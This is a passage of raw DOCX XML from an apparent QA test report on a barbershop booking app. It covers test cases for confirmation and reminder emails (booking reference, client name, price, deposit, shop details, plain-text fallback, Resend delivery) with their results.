          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="743DA37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20 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BB50B7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5D1964C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="796CA24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BCF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5799D2D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433B18C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Subject includes booking reference </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BB-F47AC10B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4D31DEA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0D38C45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EBFB7F2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="647FC72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BCF-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1507684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5838281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includes shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D679C7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0AEADA2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C74405C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4C00BE7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BCF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5396D4E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5C71C82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greets client by name (</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>James Wright</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1418692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0786764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1059EF4" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="22D5D69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BCF-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="009688D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2A0D8BF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shows prominent booking reference block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64BF11A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1114AB8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6BB5608" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2FAFDDF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BCF-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="08E3391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101180C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displays the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BB-XXXXXXXX</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> reference code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0A85CA8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49B66E8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D466A9B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BE0701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BCF-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C37D2B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449C1D4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displays service name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="341B583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1813739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A8972EB" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="517494B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BCF-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="007A63F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258A2C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displays barber name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4D69E67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72BC3D5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C5B68B5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="460A6C3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BCF-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18E6B22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654D6E2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displays formatted date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66872B1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6A8D5DF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F292697" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="69CCD1A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BCF-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7192DA3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29CA49D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displays formatted price (£35.00)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="507ECF0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2BD96CA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8E84638" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78BA615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BCF-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21355BC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170F20B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shows deposit paid row when deposit provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A67A9A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35E4784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5A0F8F0" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="21DA8BD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BCF-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5832909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26E2C00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displays shop </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>address when provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="63ECF8E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Present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="15165AA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0E30A16" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B7AC61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BCF-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="100EFF7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2A6BED5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links shop phone as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="097C424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7F06547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E851083" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1106B1F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BCF-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="48E5ADD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2E49EC0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Plain text includes booking reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="64F10F8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0EEE7ED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23F475F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01D76EF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BCF-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="40C80F6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5603EC4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Plain text includes all key fields (name, service, barber, date)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F8CA5C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4 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01BFB2E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EC80802" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="40A1E03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BCF-23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1D24045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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="09C6327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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="138B3BC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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>f837eac6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F800EE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bl>
    <w:p w14:paraId="6AE823FE"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Booking Confirmed [BB-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>F47AC10B] —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crown Cuts Barbershop · Wednesday, 7 May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9BD5C" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="29122B87">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA25673" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="tc-brm-booking-reminder"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-BRM — Booking Reminder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB666D"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Triggered by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vercel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cron job (</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/reminders</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) ~24 hours before a confirmed appointment. Plan-gated.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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="20697F42"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5FF525C2"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5AB66C3A"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="2362C45D"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1F13EEB7"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5AB9AE88"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7405A447" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0A43D76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BRM-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="67AA53E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0C613FC0"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="09D76E2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28A8EFD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FD215F4" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="177C393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BRM-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13AB015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225E4536"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1591F8B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3575 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1BFF64F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7715670" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="29A0F58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BRM-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1EF8054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2BEE2D7C"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
